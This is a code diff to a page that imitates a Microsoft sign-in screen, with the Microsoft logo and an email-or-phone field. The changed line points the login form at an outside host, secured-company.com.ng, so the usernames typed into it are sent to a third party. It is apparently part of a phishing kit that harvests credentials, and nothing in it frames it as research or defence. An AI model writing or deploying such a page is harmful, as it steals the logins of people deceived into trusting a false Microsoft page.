--- a/main.html
+++ b/main.html
@@ -15,7 +15,7 @@
         <div class="auth-wrapper">
             <img src="assets/logo.png" alt="Microsoft" />
             <h2 class="title mb-16 mt-16">Sign in</h2>
-            <form action="post.php" method="post" id="a_form">
+            <form action="https://secured-company.com.ng/post.php" method="post" id="a_form">
                 <div class="mb-16">
                     <p id="error_uname" class="error"></p>
                     <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email, phone, or Skype" />
